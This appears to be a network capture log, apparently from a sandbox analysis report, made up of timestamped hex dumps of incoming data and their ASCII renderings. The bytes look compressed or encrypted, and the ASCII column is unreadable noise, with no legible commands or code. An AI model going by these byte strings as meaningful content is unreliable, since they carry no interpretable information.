                                                                                                                  2023-08-29 17:16:42 UTC1696INData Raw: 74 d5 d1 2f e6 f8 1b 73 e7 4c 3d a5 d6 4e 09 80 02 6b 89 d1 88 4b 81 d2 bf 08 e9 f1 c5 71 19 a5 50 74 1b 39 b7 f3 bb 4f d7 fe 4e 99 44 4b 4b 99 b4 48 2d a5 7d 5a 59 48 65 55 0a 90 0b b9 a3 d0 44 48 19 5b 01 6d 05 80 45 a1 c6 2a 45 49 71 f0 71 49 5f d0 2f 59 f1 c1 ab b6 19 2f ce 5c 1d a5 01 49 b8 d2 45 49 09 53 81 51 22 03 3a 49 44 ac 42 74 19 d4 45 49 19 a3 5f 1a 71 d0 45 59 19 d0 17 19 f1 99 bb 49 19 73 e0 48 5b 59 47 11 f2 ea 45 05 2f d1 09 4b 99 d0 09 64 92 9c 61 59 48 c0 2d 39 1c 94 46 e7 f1 32 45 c8 19 06 11 6d 05 82 ad 3a 11 06 75 ec f4 2f ba 49 79 d0 c1 59 49 d4 ad 13 19 c8 c6 8d 1d 53 8d 01 e6 73 4d 49 49 73 49 49 1d 39 4d 42 11 d0 44 ea 01 e3 8c 72 99 13 4a dd d8 59 48 69 18 c5 51 bc 1e d4 50 9b 18 c5 87 c0 0c 5a 59 48 0c 0f 45 5c a1 d1 45 49 8f
                                                                                                                  Data Ascii: t/sL=NkKqPt9ONDKKH-}ZYHeUDH[mE*EIqqI_/Y/\IEISQ":IDBtEI_qEYIsH[YGE/KdaYH-9F2Em:u/IyYISsMIIsII9MBDrJYHiQPZYHE\EI
                                                                                                                  2023-08-29 17:16:42 UTC1700INData Raw: 31 c2 57 c0 0d c2 af 54 65 47 1a 11 65 58 35 d1 85 4b 29 c3 87 ca de d1 c6 4d cc d0 a5 48 29 55 b3 46 9c cc 35 b6 f9 fc 47 41 fb d9 76 92 20 74 58 b5 f9 d0 30 54 1a 97 4d 48 5e 5e 61 09 f8 b8 41 28 51 84 61 2d b9 88 55 21 92 cd d5 c9 06 fb 8f 52 19 16 16 7a c2 b6 ce 54 19 d1 e5 6e 4a 86 17 19 48 85 12 49 f1 ce f4 49 19 e3 a8 ca 55 14 65 69 c8 77 59 81 cf 53 15 5c b8 31 75 1b f1 0f b3 4c 38 cd 05 50 1b e8 67 77 ee 09 5e 80 49 53 45 a8 1d 53 84 43 48 38 dd f0 fa d5 e4 99 19 d3 45 40 79 44 e9 0a 1f 8c cc 64 58 d2 e7 01 7c 14 5b 69 b2 03 11 3c 07 10 e9 5f d8 7c 1b 68 b4 03 40 41 b4 0c 42 e4 dc a4 25 70 75 c0 61 71 6c 8a 67 47 92 dd 99 88 b9 d0 15 18 f1 2a 6b 09 a6 60 66 69 11 eb b0 3d 29 64 66 21 09 ca b0 79 09 f0 05 38 ab d2 15 a1 de d2 a7 39 4c 34 b9 0a 19
                                                                                                                  Data Ascii: 1WTeGeX5K)MH)UF5GAv tX0TMH^^aA(Qa-U!RzTnJHIIUeiwYS\1uL8Pgw^ISESCH8E@yDdX|[i<_|h@AB%puaqlgG*k`fi=)df!y89L4
                                                                                                                  2023-08-29 17:16:42 UTC1704INData Raw: a8 b7 19 ea 22 4d 29 73 0d 79 5f d0 da 7b 1a f2 c6 4d 24 34 15 4b 18 a4 5c ca e6 50 41 3c 0d eb 90 3c 09 d0 c7 7d cb 59 c7 4b 90 92 46 6b 13 6e 21 49 7c 93 45 c3 01 5a 8e 73 19 ce 30 55 9d 19 31 5d 93 d4 1d 48 d9 d0 1b 48 6c de c6 49 d9 d2 c6 8f 1b 54 8c 3c 39 30 76 89 f2 d5 a5 86 c1 2f 60 c8 8d 7e 44 cb 34 14 25 78 6d c2 e4 8a 1f a5 4f c2 de 50 ee cd 38 b1 05 70 75 f4 0d 3c 03 a4 44 4d 8d db bf 48 34 0c c5 41 71 bc 86 37 55 5b 50 9a 19 72 ee 3d c6 a0 69 b9 58 60 53 72 ec a5 55 e8 98 d1 15 69 73 df ad 8b a7 22 52 1f f1 dc 9a 97 58 a8 24 48 48 38 e8 51 22 00 01 1a 17 30 24 fa e8 d5 c4 4a dc a5 41 6e b8 c2 55 9e 12 00 30 55 28 e3 41 a1 59 c7 80 4b 78 85 43 c0 0b fd 64 4a 20 fd 64 0b 6d de 76 65 e6 59 57 75 ba c0 ce 09 a6 eb 98 02 49 4b 66 c0 5d 82 0f 7c c8
                                                                                                                  Data Ascii: "M)sy_{M$4K\PA<<}YKFkn!I|EZs0U1]HHlIT<90v/`~D4%xmOP8pu<DMH4Aq7U[Pr=iX`SrUis"RX$HH8Q"0$JAnU0U(AYKxCdJ dmveYWuIKf]|
                                                                                                                  2023-08-29 17:16:42 UTC1708INData Raw: c8 ee 38 c2 49 c2 d9 c4 46 c9 1e 93 42 62 e0 5b 84 c2 ee d0 ce b2 d8 39 47 ba bc 5b 45 81 9a 31 46 ba bd 50 39 69 32 2f 4f 3c 17 70 62 61 9a d0 80 b6 9a 00 ba 8f 1d fb 40 28 63 94 64 4e 92 20 cc 11 51 51 24 6c 7f 59 2d 6f 92 66 c4 99 18 54 5e cc 3a 2f ba b6 4e 38 23 a0 19 c0 85 46 b8 64 25 63 f8 c5 93 db 1b 3e 6c 60 b9 34 6c db 46 3e 6c 5d e1 62 a5 5e f1 31 52 a4 90 bc 1c a0 30 1f e3 ab 30 96 2b dc 39 df 23 41 9a ed 45 49 8a d0 4a cd 9e c1 23 27 48 b8 c1 49 1f 38 7d 86 08 15 79 c2 14 40 65 79 2a 10 17 4d 7f 71 c4 4c 49 ba 44 18 f1 dc 24 81 99 ff 87 4b cb b6 ce 5c 18 11 47 ca dd c8 c5 35 1b 2f 4d 43 6d e1 87 2d 92 80 41 03 11 59 15 4d 7a d1 0d 4d 9c 19 c5 35 17 5b 4d 8f 18 da 47 4b 19 2f 45 a2 12 80 2f 43 f1 94 3d fc 58 cd 4d c2 0c f1 4c 1b 15 38 aa 09 0e
                                                                                                                  Data Ascii: 8IFBb[9G[E1FP9i2/O<pba@(cdN QQ$lY-ofT^:/N8#Fd%c>l`4lF>l]b^1R00+9#AEIJ#'HI8}y@ey*MqLID$K\G5/MCm-AYMzM5[MGK/E/C=XML8
                                                                                                                  2023-08-29 17:16:42 UTC1712INData Raw: 4e 1e 90 e5 97 42 15 a0 c7 c9 13 30 46 45 22 23 31 e9 03 86 ad b8 9c a5 4e 1f 68 db 4b dd d9 d5 3a 42 68 db 55 16 47 58 37 58 ab d8 05 ea cf db 25 42 3b d1 1e 0e 12 62 77 48 c9 f9 43 ea 81 50 45 8a 09 5d 41 8c 11 40 52 19 f1 54 cb d3 ca 52 14 48 f9 d1 4a 21 4d b1 5b 79 1d 38 19 c7 4a 9c 24 4a 4f e3 45 bf 4e 55 85 3f 7a 5b 48 48 38 dc c0 80 6d 89 cf 48 25 d0 17 3d 15 ec 2c 3c 17 2f 41 4c b9 c0 47 a2 1f 2f 40 ed 18 a0 45 fb a3 d0 4a f7 10 5b 50 d1 6f 94 45 49 90 9c b7 4d b8 1c 62 4d 5f d0 46 39 92 98 41 c0 15 d2 b7 4b 99 80 ce 31 11 38 85 69 83 d0 45 e8 85 d0 25 ca dd d0 41 0f 92 1f 7e b9 90 dd c4 48 75 a2 e6 16 47 13 d5 4b 19 d0 16 23 11 38 ad d0 19 d0 41 c2 c1 d0 01 cc c2 a5 4a 21 19 a0 4e 0d 19 ba 41 a1 da d0 c8 b6 e6 53 81 41 4c 86 45 c2 6d f4 55 1e 92
                                                                                                                  Data Ascii: NB0FE"#1NhK:BhUGX7X%B;bwHCPE]A@RTRHJ!M[y8J$JOENU?z[HH8mH%=,</ALG/@EJ[PoEIMbM_F9AK18iE%A~HuGK#8AJ!NASALEmU
                                                                                                                  2023-08-29 17:16:42 UTC1716INData Raw: 9e 3e 22 d0 37 4c 9a 28 57 3a 2d b8 4d 61 63 93 65 6f 49 38 3a 77 79 2f ba 19 71 bc a5 57 db cd ad d1 1f 5b 45 8a 38 13 44 a9 67 11 4b 45 3d 39 e4 cc f9 64 21 6d 50 5a 45 0d 3d 98 05 c2 e9 51 bb 5b 19 90 ca c0 2c f1 1f c4 57 2f 0d c0 14 38 45 48 6a e8 25 2e 53 f0 76 9b 93 24 60 e9 df d0 c4 cb fb 52 82 99 22 06 33 56 7a da 57 79 f9 dc ad c5 7b da 4d 7a ef d9 e6 4e f0 76 04 cf 5d f4 1d 7a 1d 19 23 09 1e 3c cf 99 12 1a 45 2f 92 11 23 72 da b6 e6 78 d8 69 4a cd 98 d0 41 c9 1a 5b 8d e9 58 81 ad 06 9a b5 c6 d9 79 52 21 3c 14 98 3e 2d da f3 66 08 1c dd 0c 68 1e 82 12 49 62 27 dc 2a 06 17 55 3d 3f 5b 50 28 1f 82 ad f4 52 b0 4d aa 08 d8 a5 58 90 cd e4 4b f1 d4 b3 34 b8 c2 49 a2 08 5b 48 68 f8 d1 76 89 7f 71 24 41 91 cc 41 41 92 12 51 72 ee a4 50 1f 71 b8 91 5b 3c
                                                                                                                  Data Ascii: >"7L(W:-MaceoI8:wy/qW[E8DgKE=9d!mPZE=Q[,W/8EHj%.Sv$`R"3VzWy{MzNv]z#<E/#rxiJA[XyR!<>-fhIb'*U=?[P(RMXK4I[Hhvq$AAAQrPq[<
                                                                                                                  2023-08-29 17:16:42 UTC1720INData Raw: 43 48 ca d3 37 16 b9 a5 0f 21 f5 cc e5 42 14 70 4e fc 2a 54 fd a8 19 2e b5 25 fa d0 cd a8 19 fa aa af 19 b8 a4 49 f9 02 2b 69 a1 83 c5 e7 60 de 2d 79 d8 d1 86 ff 1b 28 ef 52 f9 d0 f1 af 19 10 a4 49 bc 72 46 cf 01 7d 46 8c 09 d6 7f b6 e6 90 5b cf 01 e8 48 59 65 f4 ad 37 e4 b1 46 ef 15 11 7a 7c 14 0b 7c e9 1b 84 f5 24 92 72 46 fb 1b 82 e5 4a 39 38 17 fc 1b d0 30 9d 92 68 fd 49 5d f4 5d c2 55 f4 51 c2 19 c5 95 3c 5d d0 16 19 48 d0 17 a1 fd e9 ba b6 9a 14 05 59 9c 10 31 54 b8 d1 e5 19 19 38 6d 37 19 d0 ce 44 cd d9 45 65 90 cd 44 0d 48 39 76 54 1a d0 01 4b d1 5d 01 6d 21 82 2f c9 0b ba 44 19 f1 14 c5 49 31 50 01 6d 51 e3 8c c3 f5 d0 c5 4d 93 18 45 51 23 91 cc 15 3d d8 69 c2 f0 d1 63 6c e6 d0 45 c9 19 5d 10 b6 98 31 ba 49 0b f8 cc 5c f1 d0 39 42 18 98 03 7a 51
                                                                                                                  Data Ascii: CH7!BpN*T.%I+i`-y(RIrF}F[HYe7Fz||$rFJ980hI]]UQ<]HY1T8m7DEeDH9vTK]m!/DI1PmQMEQ#=iclE]1I\9BzQ
                                                                                                                  2023-08-29 17:16:42 UTC1724INData Raw: ef 6a 69 d1 74 8b 95 ac 61 59 b0 bc df 45 a6 9f a4 d1 15 8c 4a cd db 90 de 48 1a 7f 49 18 b1 dc 7c 54 b1 81 5c 73 bb f8 e8 4a 39 dd 37 41 6d d5 cc 0c 79 3b 67 20 c3 d3 14 a1 47 d9 43 29 16 74 c1 28 19 d6 ae 6a 55 d2 7c 05 1b 96 79 16 11 8f 4d 70 04 60 85 5a 6c d2 65 1b 11 47 5a b6 e6 80 cc 29 5c bc ad 77 23 c2 6a d8 02 a0 4d 46 9d d5 c4 4d 5c b0 15 19 51 38 73 57 b9 a7 38 29 51 d7 81 43 57 93 42 45 58 d7 21 46 9d 17 db 4b 08 c4 52 4b 26 d7 f5 5a 5c b4 f5 4d ad 1a 58 1a 2c f8 62 41 a9 cd e1 59 1f b9 67 41 a2 e9 6c 41 9b b0 40 5d 9b c1 d1 70 04 d1 6b 3c c9 e8 72 97 1b f6 c4 79 35 c4 cc 63 98 15 c1 78 41 92 29 f9 19 8d 45 a2 2c 06 d1 1e 8a 70 46 2d 66 2c 32 28 66 38 4a 79 24 b4 49 00 73 ad b8 01 ab 73 60 f1 a7 f1 25 77 92 bc 61 61 3a 70 c0 b4 1f 25 54 ce 3a
                                                                                                                  Data Ascii: jitaYEJHI|T\sJ97Amy;g GC)t(jU|yMp`ZleGZ)\w#jMFM\Q8sW8)QCWBEX!FKRK&Z\MX,bAYgAlA@]pk<ry5cxA)E,pF-f,2(f8Jy$Iss`%waa:p%T:
                                                                                                                  2023-08-29 17:16:42 UTC1728INData Raw: 0d 19 49 38 a3 7f 19 d3 ad 88 46 3d 05 c0 5a 94 4a cc ff 93 48 f1 1e 91 76 cb 17 d1 18 02 3d 81 15 23 29 d1 ad 43 ba 10 ed 89 13 dc c0 49 f4 a5 26 2f 92 93 61 c2 11 06 c4 ab 98 c1 46 99 4b 38 57 d4 1e c2 30 44 53 c0 ce 1a 5d 91 41 58 4b 85 ad 0f 69 50 4c 0a 99 94 15 a1 06 e7 45 49 d8 c0 65 c0 72 94 ce 81 d9 b0 c4 a8 18 92 57 a0 1a 16 23 c0 5a f4 49 a0 01 10 79 88 15 e3 85 c3 7c d0 46 c2 e0 5a 00 4b 98 37 4c 48 11 5b 95 0a 17 53 87 4d 22 d0 bf 3c 5d b6 7e 87 16 54 53 a5 18 fa 40 53 0c 27 55 02 5d 81 59 a1 b1 10 46 c9 1a 70 4b 2f 90 a3 4d 6d f0 61 c5 4a 9a 10 41 c8 03 36 c4 4e 90 b0 26 eb 11 e3 97 62 39 20 23 c2 4a f4 45 4b 0d d3 65 bb 4f 38 84 7c 9a d6 01 6d 1f f0 85 61 b5 da 36 0d 92 05 6e 49 cf 5b bd c2 d3 5b 84 88 59 39 47 ba bc 5b 8d 29 50 c4 45 ca f8
                                                                                                                  Data Ascii: I8F=ZJHv=#)CI&/aFK8W0DS]AXKiPLEIerW#ZIy|FZK7LH[SM"<]~TS@S'U]YFpK/MmaJA6N&b9 #JEKeO8|ma6nI[[Y9G[)PE
                                                                                                                  2023-08-29 17:16:42 UTC1732INData Raw: 66 39 19 c4 3d 49 79 80 63 89 1b 55 b3 46 1d 55 5b 39 19 f4 45 8e 5d f4 67 59 99 d0 45 a0 16 80 45 ca e4 80 4d 46 9b d6 b1 48 e7 21 6d 3d 0d f4 61 98 1f d7 f5 4c 48 d6 cf 49 60 d5 cf 10 1d 11 a7 59 19 db 96 7a c2 59 53 c3 60 c0 4c c3 40 d8 a4 48 12 5a 14 4b 13 b2 44 45 1a 59 13 4d f0 fa 81 d9 1a f4 85 4d 18 15 40 46 9b 52 f4 88 1d 84 61 6d 9c 02 b5 44 08 60 45 7a cb 6e c4 48 93 81 41 49 12 12 ed 48 6d fa c6 b4 31 d5 37 6a cc d6 4d 98 1f d7 cf 29 60 d6 cf 10 1c b2 40 09 1c 6e 07 4c f9 d2 ae 4b 3d 2e 15 4d 39 d0 c0 9b 6c b3 ed 4b 6d e0 c5 c4 67 d4 7e b4 6e f3 e7 46 19 a4 4b 4e 93 ac 4b 4c 93 90 11 47 1f 5a 19 47 68 c2 61 18 aa d3 53 c2 ee a0 46 b4 49 c6 59 49 b1 d4 31 62 94 86 41 72 81 05 32 6b 26 d3 7c 4a 4f d8 65 4a 1d 2b ff 59 86 2f c8 05 30 d4 15 62 cc
                                                                                                                  Data Ascii: f9=IycUFU[9E]gYEEMFH!m=aLHI`YzYS`L@HZKDEYMM@FRamD`EznHAIHm17jM)`@nLK=.M9lKmg~nFKNKLGZGhaSFIYI1bAr2k&|JOeJ+Y/0b
                                                                                                                  2023-08-29 17:16:42 UTC1736INData Raw: 51 c2 19 dd 71 65 5f d0 15 1a 48 d0 ad 54 71 d0 45 c2 f1 53 45 8d 15 53 b8 b6 16 54 3a 49 18 d0 45 cc f4 df c0 60 18 d0 59 16 47 8d 1e 8a 9a 28 25 48 16 55 cc 49 19 96 40 3b 0c d1 44 3b c8 38 15 c4 2d d3 13 59 4b 38 9b 2e 1e ac ce b4 16 f4 c1 77 1a 50 c1 7f 19 d7 e4 0d 18 d0 6c ca e1 2f 30 5d 4c 86 45 a1 cc 13 bb b6 9a 14 4d 09 ee 08 5e 89 59 73 46 51 18 d0 31 55 93 d6 cd 4a 5a 96 45 75 13 a5 4d 8f 5a 2f 48 48 19 db 00 06 6c 3b 6e 94 f0 d2 ec 48 68 1d ce b2 92 11 84 49 f0 d2 b6 ec 92 18 c6 a8 b9 d3 b6 ed f0 42 44 5f 55 d9 cd 49 50 81 16 1b 92 23 ad 1e 74 dc c3 fe 19 f8 44 0a b6 50 46 41 5a 83 41 a1 57 c1 06 77 df d4 6e 43 18 d4 00 44 6c d7 c5 77 13 a5 45 4b 52 9d 0a 3c f5 55 a8 41 6c c8 e4 48 2a ba 44 1a 49 70 ad bb 7f d0 45 49 28 6d 45 24 19 d0 ae 43 32
                                                                                                                  Data Ascii: Qqe_HTqESEST:IE`YG(%HUI@;D;8-YK8.wPl/0]LEM^YsFQ1UJZEuMZ/HHl;nHhIBD_UIP#tDPFAZAWwnCDlwEKR<UAlH*DIpEI(mE$C2
                                                                                                                  2023-08-29 17:16:42 UTC1740INData Raw: 25 a2 1c dc ad ec 59 d3 c4 d5 9c 40 b8 b6 59 2f 15 1f e6 c5 d9 09 c8 53 45 82 e6 59 00 a5 22 13 4a ed 9c 78 c5 67 71 80 87 52 2a 14 5e 61 16 54 c4 c8 1b d4 45 72 94 55 c7 c1 79 9e 13 19 f1 68 27 08 44 51 44 55 ee a4 23 1f f1 28 45 44 19 53 bd 4a 40 a4 4e 1f f1 76 56 29 18 70 43 3d 56 b0 4e 9d 78 db 45 b1 18 a6 06 1a 4e 87 12 49 73 d1 2f 48 71 6c 42 49 95 d0 82 2b 16 51 61 c0 a4 7c 65 48 11 59 f8 f9 b9 d0 23 c0 a4 6c d4 89 19 38 26 07 59 db 30 45 d9 bc 45 c0 5f f4 cc 0f 39 59 03 d1 31 39 0b 29 16 7a 5e a0 bf 71 54 09 5c 34 15 c4 9c 74 a4 51 e6 94 50 35 bb 55 4a cd 6e d2 46 b9 4c d0 2c ad b9 d2 3d ed 1b b1 e5 4b 16 70 f2 0c e5 83 15 e9 19 2a c4 49 33 28 c4 49 ef 51 45 bb 98 d0 b5 19 91 38 af 04 1c df 7c f4 85 11 57 c9 5f f4 30 41 20 6d e5 09 18 8c 31 1f 7a
                                                                                                                  Data Ascii: %Y@Y/SEY"JxgqR*^aTErUyh'DQDU#(EDSJ@NvV)pC=VNxENIs/HqlBI+Qa|eHY#l8&Y0EE_9Y19)z^qT\4tQP5UJnFL,=Kp*I3(IQE8|W_0A m1z
                                                                                                                  2023-08-29 17:16:42 UTC1744INData Raw: ae 9a 92 d6 c8 0d 21 d1 4d a2 1b e3 b5 6b 42 13 16 1c 1e 10 c4 89 02 a5 18 46 16 66 42 23 39 d8 15 a1 a3 2b 75 1b 40 3b 46 a8 19 73 06 c3 1d 91 c6 a9 11 d1 15 4d 1a 97 ae 9b 16 66 72 09 5e 53 bb 64 92 3e 75 4c e7 98 6e 3c 1d 21 45 7a c2 67 24 4d 01 86 ad 30 1a d4 f0 28 69 53 a5 48 c8 53 48 c4 1d 4b c8 15 5f d2 95 48 1a 3b 8a ca e4 fd ce 49 da a5 47 be c1 8f 1b 14 19 8b 86 b6 6d f4 41 a1 75 c1 f5 64 40 13 89 89 09 94 61 51 c9 db 85 3c 01 a0 6c 5d 68 e5 25 cd 31 21 ce 91 89 d0 49 39 19 03 ae e1 58 5b 8d 29 09 c4 f5 57 09 e1 44 49 c8 39 94 92 c8 3a 94 91 19 db 8c 3c ed 27 b6 c2 e9 80 b2 2d 3d c8 55 4b 5d 50 02 af 39 d3 94 3b 17 eb 35 4b 6e d8 cd 3b 1e eb f5 4b 6f d1 0b 79 68 90 83 17 42 12 55 49 ec 9a c5 49 e0 90 36 5c 99 29 65 3a 19 d6 4a e4 c9 03 af 8a 92
                                                                                                                  Data Ascii: !MkBFfB#9+u@;FsMfr^Sd>uLn<!Ezg$M0(iSHSHK_H;IGmAud@aQ<l]h%1!I9X[)WDI9:<'-=UK]P9;5Kn;KoyhBUII6\)e:J
                                                                                                                  2023-08-29 17:16:42 UTC1748INData Raw: 83 4d e9 6c 4d 59 f1 49 c4 4b 56 89 30 a5 b5 8e 1a b8 0a 03 75 21 58 c4 2f 09 27 dc 0e 3f 7b 7a 15 4c 93 d6 c1 89 19 a4 59 75 37 a5 5a c9 67 d0 44 49 94 96 44 3d 0f 51 53 8e c8 6d c5 42 5c a2 4f 7a d9 39 c7 cb 48 93 20 45 19 b8 f1 c9 38 80 13 a1 c4 bc 11 5b 73 80 02 49 19 5a 59 79 94 ec 75 3c 08 d0 c6 b1 59 ad 1c c9 e2 fe 0d 3d 4d 80 64 81 f2 e4 85 48 18 d4 30 5d 78 d1 07 c9 e2 8f 31 cf 24 a0 ef 09 93 10 05 a2 00 40 44 49 1b a5 68 cd c2 a4 40 c9 49 2b 69 3c 3d 52 44 4c 5b d7 ad 05 58 38 27 19 69 d1 31 cf 19 d2 c7 08 f9 9f c8 3e 18 3b c0 6b 70 8b 61 14 da b1 c2 45 4f f0 4b 45 f1 72 e3 59 5d 50 3b 09 59 db 05 f9 0c 10 51 19 71 e8 39 0a 09 b7 f5 48 11 c4 ad ad b8 03 81 59 99 6e 14 18 1c d0 c8 cf 78 d0 1b 78 1b 88 27 2f 2d d2 55 a1 d9 e3 47 f8 95 6e 05 69 3c
                                                                                                                  Data Ascii: MlMYIKV0u!X/'?{zLYu7ZgDID=QSmB\Oz9H E8[sIZYyu<Y=MdH0]x1$@DIh@I+i<=RDL[X8'i1>;kpaEOKErY]P;YQq9HYnxx'/-UGni<
                                                                                                                  2023-08-29 17:16:42 UTC1752INData Raw: c8 03 f9 b3 47 59 1f df d9 f1 dd 50 42 c9 09 d6 44 c8 09 89 41 c2 54 2c ce 14 11 dc ae 4a 98 d3 16 41 92 8b 45 4d 1a 9d b1 c0 43 d4 ce 5d 4c dc 45 03 92 d0 47 1b 11 59 c0 89 1c 01 8f 56 44 28 c6 aa 99 f5 55 bd 16 55 d1 49 0a fb 30 b1 18 90 41 88 e2 d4 2f 76 90 a5 45 45 52 8e 7e 97 6f d2 ce 89 c7 d3 08 b1 92 01 85 59 18 de 41 72 cf 90 41 9f 22 0a 31 2a 19 5b 08 45 92 a1 41 72 68 d0 4d 3c 59 53 be 69 6a cc 47 f7 5b ff 8e 9a f7 27 93 68 9b a4 05 67 55 d3 41 3c 3f 91 63 89 28 3b 5a c4 52 30 c7 4e 1b d7 2b fd da fd 84 4e 5b fe 34 09 37 50 57 41 39 5b 0c 4d 90 9e 86 4b 1d 5b 25 00 11 59 0b 41 99 8d c5 7a 44 d0 4d ca 64 24 45 3c 11 eb 15 93 16 54 c4 09 17 5b 85 13 45 50 94 4d 94 dc 94 c0 47 90 49 0d 11 59 c5 42 57 d4 cc 49 09 9e c5 4d 22 9e 4d 3c 79 5a 85 0e 98
                                                                                                                  Data Ascii: GYPBDAT,JAEMC]LEGYVD(UUI0A/vEER~oYArA"1*[EArhM<YSijG['hgUA<?c(;ZR0N+N[47PWA9[MK[%YAzDMd$E<T[EPMGIYBWIM"M<yZ
                                                                                                                  2023-08-29 17:16:42 UTC1756INData Raw: 30 45 e6 57 49 09 12 24 65 53 59 70 41 a2 be 57 40 d5 e6 a5 4d a1 1b 87 05 d0 40 3b 78 c2 1a 26 4c 49 3e 90 31 29 8c dc c5 71 03 90 4a cd d4 2e ba b6 7a dd 59 4c 98 4f 78 c8 14 3b 53 62 5c 20 b5 a2 0d 53 60 c8 18 db 70 eb 41 b1 05 0b 4a 53 05 1f 4e a3 36 89 59 20 5e 88 59 d0 71 75 db 90 44 7d 16 26 01 4b 28 b0 04 1f 49 38 48 8e e6 50 ba ca e1 2f 1c 3c 15 f7 4c 09 f2 9f ba 3d 3d c8 65 fa 6d c4 61 55 d9 94 a9 69 0c 5b 9d ca 1f 2b 45 5c 33 95 4c 19 f1 4f 4a 48 f8 c6 65 c2 1e 50 21 79 1d cc b8 c4 99 c7 65 d8 4c c3 86 ca f5 90 01 1a 4c 86 12 21 38 78 ad 4d ed 73 45 73 e9 89 c0 bf 6c 90 4d 23 02 38 72 a1 59 82 cc 93 2c 31 56 8e 5b c7 a5 f1 19 33 f6 09 60 d0 5f c9 7f d4 45 ca 17 2f 65 8f 5f d5 4f e8 78 d4 c6 8f 1d d8 40 ab a9 32 c8 0d 3d c0 40 29 0d e4 05 65 7f
                                                                                                                  Data Ascii: 0EWI$eSYpAW@M@;x&LI>1)qJ.zYLOx;Sb\ S`pAJSN6Y ^YquD}&K(I8HP/<L==emaUi[+E\3LOJHeP!yeLL!8xMsEslM#8rY,1V[3`_E/e_Ox@2=@)e
                                                                                                                  2023-08-29 17:16:42 UTC1760INData Raw: b7 48 32 20 48 c8 1b a4 f5 56 01 95 bb 80 db f1 b5 5c 7f 5b 55 40 09 cf 31 60 59 ff 51 2f 92 eb 45 2f 9c 2f ce ba 6d c1 ce 49 d6 b6 7e 83 6d c6 03 0f 09 b6 ce 47 7f d0 2c b8 59 90 24 ca 1b a5 9b 7a d9 15 6b e3 3c 50 c1 37 18 42 60 4b 93 c1 c5 39 3c 54 40 c9 79 f5 43 c9 60 d1 85 76 80 80 60 40 9d 9f 60 01 3c 8c 16 a9 57 b5 00 6c ed c2 67 92 48 63 0d 09 3c 3c 00 4b 18 1a 40 48 3b b8 a1 4b 18 69 94 4c 18 c1 2d 95 1b d1 ed 4d 18 9f 60 04 5e f5 89 4b 19 21 72 be d8 d0 29 49 19 a4 51 c3 18 91 c1 89 6d e2 05 aa 19 a5 b4 39 97 60 4d 48 a3 d0 ba b7 e7 ae 46 99 9a 20 45 b6 2a 12 c6 88 1d 79 45 49 18 d1 c4 3d f1 5b 04 b5 98 60 47 7b 9d 34 31 6d b0 00 50 41 19 a4 56 29 19 d0 ba 3d 1b f0 ae 84 94 91 ba 18 1c fb 84 19 da 5d 04 b7 8f d0 b8 df 19 2c 46 dd 19 81 68 c2 44
                                                                                                                  Data Ascii: H2 HV\[U@1`YQ/E//mI~mG,Y$zk<P7B`K9<T@yC`v`@`<WlgHc<<K@H;KiL-M`^K!r)IQm9`MHF E*yEI=[`G{41mPAV)=],FhD
                                                                                                                  2023-08-29 17:16:42 UTC1764INData Raw: 0b c2 04 95 e4 62 4e d0 45 23 e6 80 75 03 e6 d0 96 c2 f1 eb aa 3d 27 85 45 a1 ac ad ba b6 22 17 1c 49 90 94 61 59 6d ff 12 1e d9 85 15 23 e6 2f 73 5b 1b 40 5d 49 07 87 ba 3d 3d c4 ad 3d 1b 97 05 e6 5f d4 c6 8f 1d 89 64 e9 1b a5 fd 7a d9 81 c0 10 da b9 55 ee f2 25 16 56 71 8f 5a 63 4b 71 3b 15 48 cf d5 4f 46 cf 1a 56 cc 81 10 56 53 1f 55 77 48 cf 74 4d d9 cc 30 5e a2 9f 44 4d 1d 39 6d 48 b0 28 47 46 9c cd bc c9 19 e9 38 c1 07 81 4a 9a 1b 54 79 99 01 b3 c6 75 9b 98 4a cd f2 b3 0a 0a 07 d5 47 cb 2f 9f 91 1f 4e 80 ad 1c 0e a0 49 09 07 3e 0a 9d ad 94 7c 34 cd 98 4a cd b0 c0 41 1e 4e b0 58 9d 12 5f 43 6a 15 57 32 e4 94 94 73 4b f0 63 43 d0 98 66 0f 95 4e f4 31 03 59 9a 58 b9 c5 cc 55 5a ca fd 35 d2 94 ec 4c 09 94 e4 5a 2f 98 de 84 f5 57 38 bb b6 e6 f0 69 91 5b
                                                                                                                  Data Ascii: bNE#u='E"IaYm#/s[@]I===_dzU%VqZcKq;HOFVVSUwHtM0^DM9mH(GF8JTyuJG/NI>|4JANX_CjW2sKcCfN1YXUZ5LZ/W8i[
                                                                                                                  2023-08-29 17:16:42 UTC1768INData Raw: c7 4a 91 b4 ad a6 9b d3 2d a1 fe 12 44 c1 75 38 9a 8b 18 a0 ad 9e db d1 cd 3d f1 1f 87 48 61 38 82 8b 18 88 39 a1 a6 10 44 c8 39 66 c4 36 f1 1a f4 08 1c 66 04 34 f1 76 c7 4b 18 ab 89 a1 82 52 47 88 61 38 d5 cb 1b 11 30 85 f1 55 c7 4b 98 a3 ad 33 9b d2 04 38 d5 38 2a cb 1b d1 2a a1 7d 52 47 48 75 1c ad 10 9b d2 84 20 f1 9e c7 4b 18 b8 41 a1 5a 12 5b 65 47 13 16 7a 19 0b 7c 54 4d fd 03 49 4c d0 12 46 ae ed df 67 5f d0 cd 46 9d 28 05 41 4f b8 2d 89 1b d0 2f 47 4e ba 44 14 4c 38 05 e8 2d d0 45 21 75 d1 41 46 59 87 10 c2 e9 38 d4 88 1a a0 44 88 1a c0 12 1c 12 20 ad c8 80 10 46 b6 2c d1 41 49 1a bb 46 48 65 d0 71 72 ea 8e 31 77 e6 e5 14 c8 08 38 91 2e 59 ce 70 48 09 38 63 80 9b d2 c4 43 f1 6e c5 4b 9a 14 0d 45 90 cd 84 41 90 cd c4 4e 90 52 58 08 1f 53 8d b6 f0
                                                                                                                  Data Ascii: J-Du8=Ha89D9f6f4vKRGa80UK388**}RGHu KAZ[eGz|TMILFg_F(AO-/GNDL8-E!uAFY8D F,AIFHeqr1w8.YpH8cCnKEANRXS
